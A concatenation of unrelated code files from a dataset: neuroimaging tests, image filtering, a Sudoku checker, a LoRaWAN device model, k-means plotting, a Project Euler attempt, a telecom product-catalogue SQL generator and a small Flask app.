","sub_path":"services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"411304015","text":"''' Testing module for nibetaseries.interfaces.nilearn '''\nimport os\nimport shutil\nimport nibabel as nib\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import pearsonr\nfrom scipy.optimize import minimize\n\nfrom ..nilearn import AtlasConnectivity\n\n\ndef test_atlas_connectivity():\n # basedir\n base_dir = os.path.join(os.getcwd(), 'tmp')\n os.makedirs(base_dir, exist_ok=True)\n # timeseries_file (beta series)\n timeseries_file = os.path.join(base_dir,\n 'betaseries.nii.gz')\n # atlas_file\n atlas_file = os.path.join(base_dir,\n 'atlas.nii.gz')\n # atlas_lut\n atlas_lut_file = os.path.join(base_dir,\n 'lut.tsv')\n\n # dummy series of betas\n # set how the betaseries will be defined\n np.random.seed(3)\n num_trials = 40\n tgt_corr = 0.1\n bs1 = np.random.rand(num_trials)\n # create another betaseries with a target correlation\n bs2 = minimize(lambda x: abs(tgt_corr - pearsonr(bs1, x)[0]),\n np.random.rand(num_trials)).x\n\n # two identical beta series\n bs_data = np.array([[[bs1, bs2]]])\n\n # the nifti image\n bs_img = nib.Nifti1Image(bs_data, np.eye(4))\n bs_img.to_filename(timeseries_file)\n\n # make atlas nifti\n atlas_data = np.array([[[1, 2]]], dtype=np.int16)\n atlas_img = nib.Nifti1Image(atlas_data, np.eye(4))\n atlas_img.to_filename(atlas_file)\n\n # make atlas lookup table\n atlas_lut_df = pd.DataFrame({'index': [1, 2], 'regions': ['waffle', 'fries']})\n atlas_lut_df.to_csv(atlas_lut_file, index=False, sep='\\t')\n\n # expected output\n pcorr = np.corrcoef(bs_data.squeeze())\n np.fill_diagonal(pcorr, np.NaN)\n regions = atlas_lut_df['regions'].values\n pcorr_df = pd.DataFrame(pcorr, index=regions, columns=regions)\n expected_zcorr_df = pcorr_df.apply(lambda x: (np.log(1 + x) - np.log(1 - x)) * 0.5)\n\n # run instance of AtlasConnectivity\n ac = AtlasConnectivity(timeseries_file=timeseries_file,\n atlas_file=atlas_file,\n atlas_lut=atlas_lut_file)\n\n res = ac.run()\n\n output_zcorr_df = pd.read_csv(res.outputs.correlation_matrix, na_values='n/a', delimiter='\\t', index_col=0)\n\n # clean up files\n shutil.rmtree(base_dir)\n os.remove(res.outputs.correlation_matrix)\n\n # test equality of the matrices up to 3 decimals\n pd.testing.assert_frame_equal(output_zcorr_df, expected_zcorr_df,\n check_less_precise=3)\n","sub_path":"src/nibetaseries/interfaces/tests/test_nilearn.py","file_name":"test_nilearn.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"331212344","text":"''' remove salt and pepper noise from an image \nby applying median filter of size 3x3 and 5x5 '''\n\nimport cv2\nimport numpy as np \n\nimg = cv2.imread('sap.png',0)\nnew_img = cv2.imread('sap.png', 0)\nprop = img.shape\n\n#we take a window and find the median of intensity values \n#in that window and assigned it to the current pixel\n\n############### 3x3 window ############### \nfor i in range(1, prop[0] - 1):\n for j in range(1, prop[1] - 1):\n \n win = []\n for x in range(i-1, i + 2):\n for y in range(j-1, j+2):\n win.append( img[x][y] )\n #sort the values\n win.sort()\n\n new_img[i][j] = win[4]\n\ncv2.imwrite('3x3_median.jpg', new_img)\n\n\n############### 5x5 window ###############\nnew_img = cv2.imread('sap.png', 0)\n\nfor i in range(1, prop[0] - 2):\n for j in range(1, prop[1] - 2):\n win = []\n for x in range(i - 2, i + 3):\n for y in range(j - 2, j + 3):\n win.append(img[x][y])\n #sort the values\n win.sort()\n\n new_img[i][j] = win[12]\n\ncv2.imwrite('5x5_median.jpg', new_img)\n\n\n \n","sub_path":"Day6/salt_pepper_noise.py","file_name":"salt_pepper_noise.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493334128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 19 01:08:35 2016\n\n@author: owen\n\"\"\"\n# https://www.hrwhisper.me/leetcode-valid-sudoku-solver/\n#class Solution(object):\n# def isValidSudoku(self, board):\n# \"\"\"\n# :type board: List[List[str]]\n# :rtype: bool\n# \"\"\"\n# for i in range(9):\n# for j in range(9):\n# if board[i][j]!='.' and not self.check(i,j,board):\n# return False\n# return True\n# \n# def check(self,x,y,board):\n# for i in range(9):\n# if board[x][i]==board[x][y] and i!=y or board[i][y]==board[x][y] and i!=x:\n# return False\n# for i in range(3):\n# for j in range(3):\n# # if board[x//3*3+i][y//3*3+j]==board[x][y] and x!=(x//3*3+i) and y!=(y//3*3+j):\n# if board[int(x/3)*3+i][int(y/3)*3+j]==board[x][y] and x!=(int(x/3)*3+i) and y!=(int(y/3)*3+j):\n# return False\n# return True\n\nclass Solution:\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n if not board or not board[0]:\n return False\n \n m, n = len(board), len(board[0])\n if m != 9 or n != 9:\n return False\n \n # check each row \n for i in range(m):\n used = [False] * 10 # or use [False] * 9 for ord(board[i][j]) - ord('1')\n for j in range(n):\n if board[i][j] != '.':\n if used[int(board[i][j])]:\n return False\n used[int(board[i][j])] = True\n \n # check each column\n for j in range(n):\n used = [False] * 10\n for i in range(m):\n if board[i][j] != '.':\n if used[int(board[i][j])]:\n return False\n used[int(board[i][j])] = True\n \n # check each 3 by 3 cell\n for x in range(3):\n for y in range(3):\n used = [False] * 10\n for i in range(3 * x, 3 * x + 3):\n for j in range(3 * y, 3 * y + 3):\n if board[i][j] != '.':\n if used[int(board[i][j])]:\n return False\n used[int(board[i][j])] = True\n \n return True\n \nif __name__==\"__main__\":\n board=[['5','3','.','.','7','.','.','.','.'],\n ['6','.','.','1','9','5','.','.','.'],\n ['.','9','8','.','.','.','.','6','.'],\n ['8','.','.','.','6','.','.','.','3'],\n ['4','.','.','8','.','3','.','.','1'],\n ['7','.','.','.','2','.','.','.','6'],\n ['.','6','.','.','.','.','2','8','.'],\n ['.','.','.','4','1','9','.','.','5'],\n ['.','.','.','.','8','.','.','7','9']]\n print(Solution().isValidSudoku(board))","sub_path":"36. Valid Sudoku.py","file_name":"36. Valid Sudoku.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91001628","text":"from binascii import hexlify\nimport json\nimport enum\nfrom database.db1 import db1, Tables1, Channel1\nfrom database.db0 import db0, ConstDB\nfrom utils.log import logger\nfrom utils.errors import KeyDuplicateError, ReadOnlyDeny\nfrom userver.object.const import FieldDevice\nfrom userver.object.asserts import Assertions\nfrom datetime import datetime, timezone\nOTAA_EXPIRE = 5\n\nfrom sqlalchemy import Float, Column, BINARY, PrimaryKeyConstraint, Integer, ForeignKey, Numeric, Enum, DATETIME\nfrom sqlalchemy.dialects.mysql import INTEGER\nfrom sqlalchemy.orm import relationship, sessionmaker\nfrom sqlalchemy.ext.declarative import declared_attr, declarative_base\nfrom sqlalchemy import create_engine\nfrom config import SQLALCHEMY_DATABASE_URI\n\n\nBase = declarative_base()\n\n\nclass ActiveMode(enum.Enum):\n abp = 'abp'\n otaa = 'otaa'\n\n @staticmethod\n def assert_isinstanceof(value):\n assert isinstance(value, ActiveMode), '%r is not a valid ActiveMode' % value\n\n\nclass ClassType(Enum):\n a = 'A'\n b = 'B'\n c = 'C'\n\n\nclass Device(Base):\n __tablename__ = 'device'\n\n __redis_fields = (FieldDevice.app_eui,\n FieldDevice.addr,\n FieldDevice.nwkskey,\n FieldDevice.appskey,\n FieldDevice.fcnt_up,\n FieldDevice.fcnt_down,\n FieldDevice.dev_class,\n FieldDevice.adr,\n FieldDevice.check_fcnt,)\n\n __assert_switcher = {FieldDevice.active_at: Assertions.a_datetime,\n FieldDevice.active_mode: ActiveMode.assert_isinstanceof,\n FieldDevice.dev_eui: Assertions.a_eui_64,\n FieldDevice.addr: Assertions.a_dev_addr,\n FieldDevice.app_eui: Assertions.a_eui_64,\n FieldDevice.nwkskey: Assertions.a_nwkskey,\n FieldDevice.appskey: Assertions.a_appskey,\n FieldDevice.fcnt_up: Assertions.a_fcnt,\n FieldDevice.fcnt_down: Assertions.a_fcnt,\n FieldDevice.dev_class: Assertions.a_dev_class,\n FieldDevice.adr: Assertions.a_bool,\n FieldDevice.check_fcnt: Assertions.a_bool, }\n\n dev_eui = Column(BINARY(8), primary_key=True)\n app_eui = Column(BINARY(8), nullable=False)\n active_mode = Column(Enum(ActiveMode), nullable=True)\n active_at = Column(DATETIME)\n\n def active(self, addr, nwkskey, appskey=None, fcnt_up=0, fcnt_down=0, dev_class=ClassType.a, adr=True, check_fcnt=False):\n self.addr = addr\n self.nwkskey = nwkskey\n if appskey is None:\n appskey = b''\n self.appskey = appskey\n self.addr = addr\n self.addr = addr\n self.fcnt_up = fcnt_up\n self.fcnt_down = fcnt_down\n self.dev_class = dev_class\n self.adr = adr\n self.check_fcnt = check_fcnt\n key_eui = ConstDB.dev + hexlify(self.dev_eui).decode()\n pipe = db0.pipeline()\n pipe.hmset(key_eui, self.__zip_vars())\n pipe.set(ConstDB.addr + hexlify(self.addr).decode(), key_eui)\n pipe.execute()\n\n def __zip_vars(self):\n dd = {}\n for field in self.__redis_fields:\n value = getattr(self, field)\n if isinstance(value, enum.Enum):\n value = value.value\n elif isinstance(value, bool):\n value = value.real\n dd[field] = value\n return dd\n\n def publish(self):\n message = {'dev_eui': hexlify(self.dev_eui).decode(),\n 'addr': hexlify(self.addr).decode(),\n 'nwkskey': hexlify(self.nwkskey).decode(),\n 'appskey': hexlify(self.appskey).decode(),\n 'ts':self.active_at.replace(tzinfo=timezone.utc).timestamp(),\n }\n db0.publish(Channel1.join_success_alarm + hexlify(self.app_eui).decode(), json.dumps(message))\n\nclass JoiningDev:\n fields = (FieldDevice.app_eui, FieldDevice.addr)\n\n __vars_can_write = (FieldDevice.nwkskey, FieldDevice.appskey)\n\n _assert_switcher = {FieldDevice.dev_eui: Assertions.a_eui_64,\n FieldDevice.app_eui: Assertions.a_eui_64,\n FieldDevice.addr: Assertions.a_dev_addr,\n FieldDevice.nwkskey: Assertions.a_nwkskey,\n FieldDevice.appskey: Assertions.a_appskey\n }\n\n def __setattr__(self, key, value):\n if hasattr(self, key):\n raise ReadOnlyDeny\n self._assert_switcher[key](value)\n assert_method = self._assert_switcher.get(key)\n if assert_method is not None:\n self._assert_switcher[key](value)\n super.__setattr__(self, key, value)\n\n def __init__(self, app_eui, dev_eui, addr, nwkskey=None, appskey=None):\n self.app_eui = app_eui\n self.dev_eui = dev_eui\n self.addr = addr\n if nwkskey is not None:\n self.nwkskey = nwkskey\n if appskey is not None:\n self.appskey = appskey\n\n def __zip_vars(self):\n return dict(zip(self.fields, (self.app_eui, self.addr)))\n\n def __zip_vars_can_write(self):\n return dict(zip(self.__vars_can_write, (self.nwkskey, self.appskey)))\n\n def save(self):\n key_eui = Tables1.dev + hexlify(self.dev_eui).decode()\n key_addr = Tables1.addr + hexlify(self.addr).decode()\n # if db1.exists(key_eui) or db0.exists(key_eui):\n if db1.exists(key_eui):\n raise KeyDuplicateError(key_eui)\n if db1.exists(key_addr) or db0.exists(key_addr):\n raise KeyDuplicateError(key_addr)\n pipe = db1.pipeline()\n pipe.hmset(key_eui, self.__zip_vars())\n pipe.set(key_addr, key_eui)\n pipe.expire(key_addr, OTAA_EXPIRE-2)\n pipe.expire(key_eui, OTAA_EXPIRE-2)\n pipe.execute()\n\n def update(self):\n db1.hmset(Tables1.dev + hexlify(self.dev_eui).decode(), self.__zip_vars_can_write())\n\n def delete(self):\n key_eui = Tables1.dev + hexlify(self.dev_eui).decode()\n key_addr = Tables1.addr + hexlify(self.addr).decode()\n pipe = db1.pipeline()\n pipe.delete(key_eui)\n pipe.delete(key_addr)\n pipe.execute()\n\n class objects:\n @staticmethod\n def get(dev_eui):\n info = db1.hgetall(Tables1.dev + hexlify(dev_eui).decode())\n try:\n join_dev = JoiningDev(dev_eui=dev_eui, app_eui=info[b'app_eui'], addr=info[b'addr'], nwkskey=info.get(b'nwkskey'), appskey=info.get(b'appskey'))\n return join_dev\n except (KeyError, AssertionError) as error:\n logger.error('Join Success' + str(error))\n\n\n# Create an engine that stores data in the local directory's\n# sqlalchemy_example.db file.\nengine = create_engine(SQLALCHEMY_DATABASE_URI)\n\nDBSession = sessionmaker(bind=engine)\n\ndb_session = DBSession()","sub_path":"UServer/ammeter/objects/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"629575901","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.cluster import KMeans\n\nwith open('PizzaFeatures.txt') as f:\n data = [line.replace('\\n', '').split(',') for line in f]\n\ndata = np.array(data, dtype=float)\n\nX = data[:4000]\nX = X[:, 0:7]\n\nkmeans = KMeans(n_clusters=2)\nkmeans = kmeans.fit(X)\nlabels = kmeans.predict(X)\ncentroids = kmeans.cluster_centers_\n\nfirst = 0\nsecond = 3\n\nplt.scatter(X[:, first], X[:, second], c=labels, s=25, cmap='viridis')\nplt.scatter(centroids[:,0], centroids[:, 1], c='black', s=200, alpha=0.5)\n\nX = data[:4000]\nX = X[:, 0:9]\ni = 0\nwhile i < len(X):\n if X[i, 8] == 0:\n X = np.delete(X, i, axis=0)\n i = i - 1\n i = i + 1\nplt.scatter(X[:, first], X[:, second], s=2, cmap='Blues')\n\n#X = np.array(list(zip(f1[4001:4041],f2[4001:4041],f3[4001:4041],f4[4001:4041],f5[4001:4041],f6[4001:4041],f7[4001:4041],f8[4001:4041])))\n#X = data[4001:4041]\n#X = X[:, 1:7]\n#X = np.sort(X)\n#prediction = kmeans.predict(X);\n#plt.scatter(X[:,2], X[:, 4], c=prediction, s=50, cmap='viridis')\n#plt.scatter(centroids[:,0], centroids[:, 1], c='black', s=200, alpha=0.5)\n#plt.axis('off')\nplt.ylabel(\"Account Age at Request\")\nplt.xlabel(\"Upvotes\")\nplt.show()","sub_path":"MachineLearning/k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"645303496","text":"date = 2\nmonthLength = {\n 1:31,\n 2:28,\n 3:31,\n 4:30,\n 5:31,\n 6:30,\n 7:31,\n 8:31,\n 9:30,\n 10:31,\n 11:30,\n 12:31,\n}\n\nsundays = 0\n\ndef isLeapYear(number):\n if number % 4 == 0 and (number % 100 != 0 or number % 400 == 0):\n return True\n else:\n return False\n\nfor year in range(1900,2001):\n for month in range(1,13):\n if isLeapYear(year) == True and (month == 2):\n addnumb = 1\n else:\n addnumb = 0\n for day in range(1, (monthLength[month] + addnumb)):\n if date > 7:\n date = 1\n print(date)\n if date == 7:\n if day == 1:\n sundays +=1\n date = date + 1\n\nprint(sundays) #incorrect, results in one more than it should. answer is 171","sub_path":"Problem19.py","file_name":"Problem19.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301547151","text":"import xlrd\nimport datetime\n\n\ndef pm_product_tree_node_cfg(output_file,sheet,start_num,end_num=None):\n '''产品树配置 '''\n print('--产品树配置\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_TREE_NODE_CFG WHERE NODE_ID={0} AND PARENT_ID={1};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_TREE_NODE_CFG (NODE_ID, PARENT_ID, NAME, IS_LEAF, SEQUENCE, CREATE_TIME, PRODUCT_MAIN_CLASS) \\nVALUES ({0}, {1}, '{2}', {3}, '{4}', SYSDATE, null);\"\n def is_num(s):\n try:\n int(s)\n return True\n except ValueError:\n if s != '':\n print(s)\n return False\n\n col1_tmp = ''\n leaf_seq = 0\n for row_index in range(1, sheet.nrows):\n col1 = sheet.cell_value(row_index, 0)\n if col1 == '':\n col1 = col1_tmp\n col5 = sheet.cell_value(row_index, 4)\n col6 = sheet.cell_value(row_index, 5)\n if is_num(col5):\n col5 = int(col5)\n if col5 > 100:\n leaf_seq += 1\n if row_index >= start_num and row_index < end_num:\n print(del_content.format(col5, col1), file=output_file)\n print(sql_content.format(col5, col1, col6, 1, leaf_seq), file=output_file)\n\n col7 = sheet.cell_value(row_index, 6)\n col8 = sheet.cell_value(row_index, 7)\n if is_num(col7):\n col7 = int(col7)\n if col7 > 100:\n leaf_seq += 1\n if row_index >= start_num and row_index < end_num:\n print(del_content.format(col7, col1), file=output_file)\n print(sql_content.format(col7, col1, col8, 1, leaf_seq), file=output_file)\n\n col9 = sheet.cell_value(row_index, 8)\n col10 = sheet.cell_value(row_index, 9)\n if is_num(col9):\n col9 = int(col9)\n if col9 > 100:\n leaf_seq += 1\n if row_index >= start_num and row_index < end_num:\n print(del_content.format(col9, col1), file=output_file)\n print(sql_content.format(col9, col1, col10, 1, leaf_seq), file=output_file)\n\n\ndef pm_product_def(output_file,sheet,start_num,end_num=None):\n '''产品定义 '''\n print('--产品定义\\n')\n if end_num is None:\n end_num = start_num+1\n def getType(value):\n if value == '普通产品':\n return 8001\n elif value == '产品包':\n return 8004\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_DEF WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_DEF (PRODUCT_ID, NAME, PRODUCT_CODE, DESCRIPTION, STATUS, PRODUCT_TYPE, INURE_TIME, EXPIRE_TIME, SUB_PRODUCT_TYPE, PRODUCT_CLASS, PRODUCT_MANAGER_ID, PRODUCT_SUPPORT_ID, PRODUCT_FILE, PRODUCT_LOGO_FILE) VALUES ({}, '{}', '{}', '{}', 1, {}, SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), '{}', '{}', '{}', '{}', null, null);\"\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,1)\n name = sheet.cell_value(row_index,2)\n product_code = sheet.cell_value(row_index,9)\n product_type = getType(sheet.cell_value(row_index,11))\n product_class = sheet.cell_value(row_index,22)\n sub_product_type = sheet.cell_value(row_index,23)\n manager_id = sheet.cell_value(row_index,26)\n support_id = sheet.cell_value(row_index,28)\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id,name,product_code,name,product_type,sub_product_type,product_class,manager_id,support_id),file=output_file)\n\ndef pm_combo_product_cfg(output_file,sheet,start_num,end_num=None):\n '''产品包关系配置 '''\n print('--产品包关系配置\\n')\n if end_num is None:\n end_num = start_num+1 \n del_content = \"DELETE FROM PRODUCT.PM_COMBO_PRODUCT_CFG WHERE COMBO_PRODUCT_ID={} AND RELA_ID='{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_COMBO_PRODUCT_CFG (COMBO_PRODUCT_ID, RELA_TYPE, RELA_ID, INURE_TIME, EXPIRE_TIME, REFER_TYPE, OPER_MODE, MAX_NUMBER, MIN_NUMBER, CONSTRAINT_RULE) \\nVALUES ({}, 1, '{}', SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), 2, 0, -1, 0, null);\"\n for row_index in range(start_num, end_num):\n pkg = int(sheet.cell_value(row_index,1))\n rel = int(sheet.cell_value(row_index,3))\n print(del_content.format(pkg,rel),file=output_file)\n print(sql_content.format(pkg,rel),file=output_file)\n\ndef pm_prod_param_cfg(output_file,sheet,start_num,end_num=None):\n '''开通参数 '''\n print('--开通参数\\n')\n if end_num is None:\n end_num = start_num+1\n def getModify(value):\n if value=='可变更':\n return 1\n else:\n return 0\n def getEmpty(value):\n if value=='可选':\n return 1\n else:\n return 0\n del_content = \"DELETE FROM PRODUCT.PM_PROD_PARAM_CFG WHERE PRODUCT_ID={} AND PARAM_ID='{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_PROD_PARAM_CFG (PRODUCT_ID, PARAM_TYPE, PARAM_ID, CAN_MODIFY, CAN_EMPTY, CAN_DISPLAY, EFFECT_TYPE, DEFAUL_VALUE, DESCRIPTION, REGEX_VALUE, BOSS_PARAM_TYPE, SEQ_ID, STATUS, KEY_NAME, UNIT_CODE, PARAM_CODE, PLATFORM_SERVICE_ID, SYNC_FLAG, PARAM_VALUE, NAME) VALUES ({}, {}, '{}', {}, {}, 1, 1, null, '{}', null, null, {}, 1, null, null, null, null, null, null, '{}');\"\n tmp_pid=''\n seq=0\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,2)\n if product_id == '':\n product_id = tmp_pid\n seq+=1\n param_type = sheet.cell_value(row_index,15)\n param_id = sheet.cell_value(row_index,3)\n can_modify = getModify(sheet.cell_value(row_index,9))\n can_empty = getEmpty(sheet.cell_value(row_index,8))\n description = sheet.cell_value(row_index,4)\n print(del_content.format(product_id,param_id),file=output_file)\n print(sql_content.format(product_id,param_type,param_id,can_modify,can_empty,description,seq,description),file=output_file)\n\ndef pm_prod_param_opr(output_file,sheet,start_num,end_num=None):\n '''开通操作 '''\n print('--开通操作\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PROD_PARAM_OPR WHERE PRODUCT_ID={} AND PARAM_ID='{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_PROD_PARAM_OPR (PRODUCT_ID, PARAM_ID, ORDER_FLAG, CANCEL_FLAG, STOP_FLAG, RESUME_FLAG, RATE_CHANGE_FLAG, CHANGE_FLAG, EXPLORE_FLAG, PREOCCUPY_FLAG, PREOCCUPY_DELAY_FLAG, PREOCCUPY_CANCEL_FLAG, RENEW_FLAG, SYS_STOP_FLAG, SYS_RESUME_FLAG) VALUES ({}, '{}', 2, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1);\"\n tmp_pid=''\n seq=0\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,2)\n if product_id == '':\n product_id = tmp_pid\n seq+=1\n param_id = sheet.cell_value(row_index,3)\n print(del_content.format(product_id,param_id),file=output_file)\n print(sql_content.format(product_id,param_id),file=output_file)\n \ndef pm_product_rule_cfg(output_file,product_id):\n '''自动服开 '''\n print('--自动服开\\n')\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_RULE_CFG WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_RULE_CFG (RELA_ID, RULE_ID, INURE_TIME, EXPIRE_TIME, TYPE, RELA_TYPE) VALUES ('{}', 10000, SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), 3, 1);\"\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id),file=output_file)\n return '1'\n\ndef pm_product_process_cfg(output_file,product_id):\n '''自动归档 '''\n print('--自动归档\\n')\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_PROCESS_CFG WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_PROCESS_CFG (SERVICE_TYPE, PRODUCT_ID, OPR_CODE, FLOW_DEFINE_ID, PRIORITY) VALUES ('0', {}, 0, '0', 10);\"\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id),file=output_file)\n return '1'\n\ndef pm_product_attr_cfg(output_file,sheet,start_num,end_num=None):\n '''产品属性 '''\n print('--产品属性\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_ATTR_CFG WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_ATTR_CFG (PRODUCT_ID, IS_REPEAT, IS_COOPER, IS_BBOSS, IS_PBOSS, IS_DIVIDED, HAS_ADDITIONAL, HAS_MEMBER, IS_ANONYMOUS, IS_SUPPORT_RENEW, IS_INDEPENDENT, APPLY_CYCLE, MIN_APPLY_UNIT, MAX_APPLY_UNIT, REFUND_THRESHOLD, MIN_BALANCE, IS_TEAMWORK, AUTO_SERVICEOPEN, AUTO_ARCHIVE, IS_TEST, IS_FREE_SOURCE) \\nVALUES ({}, {}, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 1, -1, 0, 0, 0, {}, {}, 0, null);\"\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,1)\n is_repeat = '1' if sheet.cell_value(row_index,13) == '是' else '0'\n auto_serviceopen = '0' if sheet.cell_value(row_index,19) != '是' else pm_product_rule_cfg(output_file,product_id)\n auto_archive = '0' if sheet.cell_value(row_index,20) != '是' else pm_product_process_cfg(output_file,product_id)\n print(del_content.format(product_id),file=output_file)\n print(sql_content.format(product_id,is_repeat,auto_serviceopen,auto_archive),file=output_file)\n\n\nchannel = {'政企ESOP': {'20'},\n '北京': {'100'},\n '广东': {'200'},\n '上海': {'210'},\n '天津': {'220'},\n '重庆': {'230'},\n '辽宁': {'240'},\n '江苏': {'250'},\n '湖北': {'270'},\n '四川': {'280'},\n '陕西': {'290'},\n '河北': {'311'},\n '山西': {'351'},\n '河南': {'371'},\n '吉林': {'431'},\n '黑龙江': {'451'},\n '内蒙古': {'471'},\n '山东': {'531'},\n '安徽': {'551'},\n '浙江': {'571'},\n '福建': {'591'},\n '台湾': {'710'},\n '湖南': {'731'},\n '广西': {'771'},\n '江西': {'791'},\n '香港': {'810'},\n '澳门': {'820'},\n '贵州': {'851'},\n '云南': {'871'},\n '西藏': {'891'},\n '海南': {'898'},\n '甘肃': {'931'},\n '宁夏': {'951'},\n '青海': {'971'},\n '新疆': {'991'},\n 'BBSS': {'998'},\n '31省': {'100','200','210','220','230','240','250','270','280','290','311','351','371','431','451','471','531','551','571','591','731','771','791','851','871','891','898','931','951','971','991'}}\nimport re\ndef pm_product_channel_cfg(output_file,sheet,start_num,end_num=None):\n '''产品渠道 '''\n print('--产品渠道\\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_CHANNEL_CFG WHERE PRODUCT_ID={} AND CHANNEL_ID = {} AND OPR_CODE = '{}' AND EFFT_TYPE = '{}';\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_CHANNEL_CFG (PRODUCT_ID,CHANNEL_ID,INURE_TIME,EXPIRE_TIME,OPR_CODE,EFFT_TYPE) VALUES ({}, '{}', SYSDATE, TO_DATE('01-01-3000', 'DD-MM-YYYY'), {}, {});\"\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,2)\n channelIds = sheet.cell_value(row_index,3)\n oprTypes=[]\n if sheet.cell_value(row_index,5)=='Y':oprTypes.append('7')#资源勘查\n if sheet.cell_value(row_index,6)=='Y':oprTypes.append('8')#资源预占\n if sheet.cell_value(row_index,7)=='Y':oprTypes.append('9')#预占延期\n if sheet.cell_value(row_index,8)=='Y':oprTypes.append('10')#预占取消\n if sheet.cell_value(row_index,9)=='Y':oprTypes.append('1')#产品开通\n if sheet.cell_value(row_index,10)=='Y':oprTypes.append('5')#资费变更\n if sheet.cell_value(row_index,11)=='Y':oprTypes.append('6')#资源变更\n if sheet.cell_value(row_index,12)=='Y':oprTypes.append('23')#产品续订\n if sheet.cell_value(row_index,13)=='Y':oprTypes.append('3')#业务暂停\n if sheet.cell_value(row_index,14)=='Y':oprTypes.append('4')#业务恢复\n if sheet.cell_value(row_index,15)=='Y':oprTypes.append('2')#业务注销\n if sheet.cell_value(row_index,16)=='Y':oprTypes.append('25')#成员管理\n if sheet.cell_value(row_index,17)=='Y':oprTypes.append('44')#密码重置\n if sheet.cell_value(row_index,18)=='Y':oprTypes.append('11')#系统暂停\n if sheet.cell_value(row_index,19)=='Y':oprTypes.append('')#产品审批\n if sheet.cell_value(row_index,20)=='Y':oprTypes.append('12')#系统恢复\n if sheet.cell_value(row_index,21)=='Y':oprTypes.append('')#免费资源延期\n if sheet.cell_value(row_index,22)=='Y':oprTypes.append('')#申请退货\n pattern = re.compile(r'、')\n for channelId in re.split(pattern,channelIds):\n for channel_id in channel[channelId]:\n for oprType in oprTypes:\n print()\n\n\n\n\n\ntimestamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\nexcel = xlrd.open_workbook(r'D:\\Workspaces\\SVN\\EBOSS\\trunk\\01_需求分析\\02-产品需求\\政企EBOSS产品树.xlsx')\nprint_file = r'D:/Workspaces/{}.sql'.format(timestamp)\nwith open(print_file, encoding='utf8', mode='a') as a_file:\n # sheet = excel.sheet_by_index(3)\n sheet = excel.sheet_by_name(u'产品树')\n pm_product_tree_node_cfg(print_file,sheet,5)\n # pm_product_def(a_file,sheet,1,12)\n \n","sub_path":"python/product/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":13577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"201738747","text":"from flask import Flask, request, jsonify\nfrom _datetime import datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello() :\n \n print(datetime)\n return \"hello world\"\n\n@app.route('/jsontest', methods = ['POST'])\ndef getJson() :\n requestData = request.get_json()\n return jsonify(requestData)\n\n\nif __name__ == \"__main__\" :\n app.run(host='localhost',port='0000')\n\n\n","sub_path":"Projrct1/AppRoute.py","file_name":"AppRoute.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"303912189","text":"from tikidb_config import read_db_config\nfrom mysql.connector import MySQLConnection, Error\nimport sys\n\n\ndef insert_data(data):\n\tquery = \"INSERT INTO 